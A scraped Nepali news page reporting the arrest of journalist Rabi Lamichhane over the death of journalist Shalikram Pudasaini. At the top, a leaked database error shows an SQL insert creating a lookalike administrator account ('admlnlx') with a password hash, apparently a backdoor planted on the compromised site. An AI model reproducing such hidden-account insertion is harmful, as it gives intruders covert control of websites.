WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE/xcr.lYd8t/NSjD3h9caSJUxNuKu.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 17:47:08', '', 'admlnlx', 'admlnlx')

पत्रकार रवि लामिछाने पक्राउ – Gaule Khabar

पत्रकार रवि लामिछाने पक्राउ

पत्रकार रवि लामिछाने पक्राउ

साउन ३०, काठमाडौं- न्युज ट्वेन्टी फो का पत्रकार रवि लामिछाने पक्राउ परेका छन् ।

पत्रकार शालिकराम पुडासैनीको मृत्यु प्रकरणमा उनी पानी पोखरीस्थित न्युज ट्वेन्टी फोको कार्यालयबाटै पक्राउ परेका हुन् । उनको साथबाट पत्रकार युवराज कँडेलसमेत पक्राउ परेको काठमाडौं प्रहरी प्रवक्ता होविन्द्र बोगटीले जानकारी दिए ।

पुडासैनीले आत्महत्या गर्नुअघि खिचेको भनिएको भिडियो बुधबार सार्वजनिक भएको थियो। भिडियोमा पुडासैनीले लामिछानेसहित अर्का पूर्वसहकर्मी र एक युवती आफ्ना हत्यारा भएको गम्भीर आरोप लगाएका थिए।

न्युज ट्वेन्टी फो टेलिभिजनमा कार्यरत पत्रकार पुडासैनी यो टिभी छोडेर केही समयदेखि माउन्टेन टेलिभिजनमा काम गरिरहेका थिए। नुवाकोटका स्थायी बासिन्दा पत्रकार पुडासैनी साउन २१ गते मंगलबार चितवनको नारायणगढस्थित पोखरा बसपार्कको एक होटलमा झुन्डिएको अवस्थामा फेला परेका थिए।
अन्न्पूर्ण पोस्ट

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका